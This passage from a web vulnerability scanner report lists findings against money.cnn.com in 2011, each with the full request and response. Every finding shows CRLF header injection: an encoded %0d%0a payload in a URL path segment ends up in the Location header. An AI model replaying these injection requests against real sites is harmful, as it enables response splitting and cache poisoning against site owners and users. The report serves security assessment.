<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/pf/saving/386d0
...[SNIP]...

4.44. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm

Issue detail

The value of REST URL parameter 8 is copied into the Location response header. The payload 944bb%0d%0a0c205831719 was submitted in the REST URL parameter 8. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/944bb%0d%0a0c205831719 HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:48 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/pf/saving/caeer_goals.moneymag/944bb
0c205831719

Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/pf/saving/caeer
...[SNIP]...

4.45. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload c481b%0d%0aecc7502831d was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/c481b%0d%0aecc7502831d/05/03/retirement/inheritance_headache.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/c481b
ecc7502831d
/05/03/retirement/inheritance_headache.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 343
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/c481b
ecc7502831d/05/03/r
...[SNIP]...

4.46. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload d41cf%0d%0a7cc224e605c was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/d41cf%0d%0a7cc224e605c/03/retirement/inheritance_headache.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/d41cf
7cc224e605c
/03/retirement/inheritance_headache.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 345
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/d41cf
7cc224e605c/03
...[SNIP]...

4.47. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload a6396%0d%0a54e70abbb70 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/a6396%0d%0a54e70abbb70/retirement/inheritance_headache.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/a6396
54e70abbb70
/retirement/inheritance_headache.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 345
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/a6396
54e70abbb70
...[SNIP]...

4.48. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 50372%0d%0ad71e5693a3 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/50372%0d%0ad71e5693a3/inheritance_headache.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/50372
d71e5693a3
/inheritance_headache.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 336
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/50372
d71e5693
...[SNIP]...

4.49. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload b4e20%0d%0a9e160d42c7 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/retirement/b4e20%0d%0a9e160d42c7/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/retirement/b4e20
9e160d42c7
/index.htm
Vary: Accept-Encoding
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/retirement/b4e2
...[SNIP]...

4.50. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload e7a9b%0d%0a2e6c28b0e33 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/retirement/inheritance_headache.moneymag/e7a9b%0d%0a2e6c28b0e33 HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/retirement/inheritance_headache.moneymag/e7a9b
2e6c28b0e33

Vary: Accept-Encoding
Content-Length: 338
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/retirement/inhe
...[SNIP]...

4.51. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/autos/cruz_recall/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload cfaee%0d%0a97890f9f395 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/cfaee%0d%0a97890f9f395/05/04/autos/cruz_recall/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:41 GMT
Server: Apache
Location: http://money.cnn.com/cfaee
97890f9f395
/05/04/autos/cruz_recall/index.htm
Vary: Accept-Encoding
Content-Length: 320
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/cfaee
97890f9f395/05/04/a
...[SNIP]...

4.52. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/autos/cruz_recall/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 276a0%0d%0a4319be5c91a was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/276a0%0d%0a4319be5c91a/04/autos/cruz_recall/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/2011/276a0
4319be5c91a
/04/autos/cruz_recall/index.htm
Vary: Accept-Encoding
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/276a0
4319be5c91a/04
...[SNIP]...

4.53. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/autos/cruz_recall/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 1a2b5%0d%0af12b48cd4a1 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/1a2b5%0d%0af12b48cd4a1/autos/cruz_recall/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:43 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/1a2b5
f12b48cd4a1
/autos/cruz_recall/index.htm
Vary: Accept-Encoding
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/1a2b5
f12b48cd4a1
...[SNIP]...

4.54. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/autos/cruz_recall/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload f9e29%0d%0a96eb2cc6b99 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/f9e29%0d%0a96eb2cc6b99/cruz_recall/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/f9e29
96eb2cc6b99
/cruz_recall/index.htm
Vary: Accept-Encoding
Content-Length: 319
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/f9e29
96eb2cc6
...[SNIP]...

4.55. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/autos/cruz_recall/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload cec6e%0d%0a52d76717a7c was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/autos/cec6e%0d%0a52d76717a7c/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/autos/cec6e
52d76717a7c
/index.htm
Vary: Accept-Encoding
Content-Length: 313
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/autos/cec6e
52
...[SNIP]...

4.56. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/autos/cruz_recall/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload fd42d%0d%0a71f9eeb8f02 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/autos/cruz_recall/fd42d%0d%0a71f9eeb8f02 HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/autos/cruz_recall/fd42d
71f9eeb8f02

Vary: Accept-Encoding
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/autos/cruz_reca
...[SNIP]...

4.57. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/markets/markets_newyork/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 93492%0d%0ae298c488f49 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/93492%0d%0ae298c488f49/05/04/markets/markets_newyork/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/93492
e298c488f49
/05/04/markets/markets_newyork/index.htm
Vary: Accept-Encoding
Content-Length: 326
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/93492
e298c488f49/05/04/m
...[SNIP]...

4.58. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/markets/markets_newyork/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 9b7de%0d%0af142d288158 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/9b7de%0d%0af142d288158/04/markets/markets_newyork/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:43 GMT
Server: Apache
Location: http://money.cnn.com/2011/9b7de
f142d288158
/04/markets/markets_newyork/index.htm
Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/9b7de
f142d288158/04
...[SNIP]...

4.59. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/markets/markets_newyork/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 28f2d%0d%0ae137b1948d1 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/28f2d%0d%0ae137b1948d1/markets/markets_newyork/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/28f2d
e137b1948d1
/markets/markets_newyork/index.htm
Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/28f2d
e137b1948d1
...[SNIP]...

4.60. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/markets/markets_newyork/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 624dd%0d%0a7a44fd8182c was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/624dd%0d%0a7a44fd8182c/markets_newyork/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/624dd
7a44fd8182c
/markets_newyork/index.htm
Vary: Accept-Encoding
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/624dd
7a44fd81
...[SNIP]...

4.61. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/markets/markets_newyork/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload 73d8b%0d%0ac2cadca0a5d was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/markets/73d8b%0d%0ac2cadca0a5d/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/markets/73d8b
c2cadca0a5d
/index.htm
Vary: Accept-Encoding
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/markets/73d8b

...[SNIP]...

4.62. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/markets/markets_newyork/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload 98825%0d%0a614e4316de0 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/markets/markets_newyork/98825%0d%0a614e4316de0 HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/markets/markets_newyork/98825
614e4316de0

Vary: Accept-Encoding
Content-Length: 321
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/markets/markets
...[SNIP]...

4.63. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 404f3%0d%0a9396d192c48 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/404f3%0d%0a9396d192c48/05/04/news/companies/exxon_oil_taxes/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:41 GMT
Server: Apache
Location: http://money.cnn.com/404f3
9396d192c48
/05/04/news/companies/exxon_oil_taxes/index.htm
Vary: Accept-Encoding
Content-Length: 333
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/404f3
9396d192c48/05/04/n
...[SNIP]...

4.64. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 55fd8%0d%0a5f142f61b3 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/55fd8%0d%0a5f142f61b3/04/news/companies/exxon_oil_taxes/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/2011/55fd8
5f142f61b3
/04/news/companies/exxon_oil_taxes/index.htm
Vary: Accept-Encoding
Content-Length: 334
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/55fd8
5f142f61b3/04/
...[SNIP]...

4.65. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload c9ced%0d%0a3f30ec8af45 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/c9ced%0d%0a3f30ec8af45/news/companies/exxon_oil_taxes/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:43 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/c9ced
3f30ec8af45
/news/companies/exxon_oil_taxes/index.htm
Vary: Accept-Encoding
Content-Length: 335
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/c9ced
3f30ec8af45
...[SNIP]...

4.66. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload d83ab%0d%0a0af0d3835a2 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/d83ab%0d%0a0af0d3835a2/companies/exxon_oil_taxes/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/d83ab
0af0d3835a2
/companies/exxon_oil_taxes/index.htm
Vary: Accept-Encoding
Content-Length: 333
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/d83ab
0af0d383
...[SNIP]...

4.67. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload bbae8%0d%0ad95d85a0b19 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/news/bbae8%0d%0ad95d85a0b19/exxon_oil_taxes/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/news/bbae8
d95d85a0b19
/exxon_oil_taxes/index.htm
Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/news/bbae8
d95
...[SNIP]...

4.68. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload 63293%0d%0a77800aa245f was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/news/companies/63293%0d%0a77800aa245f/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
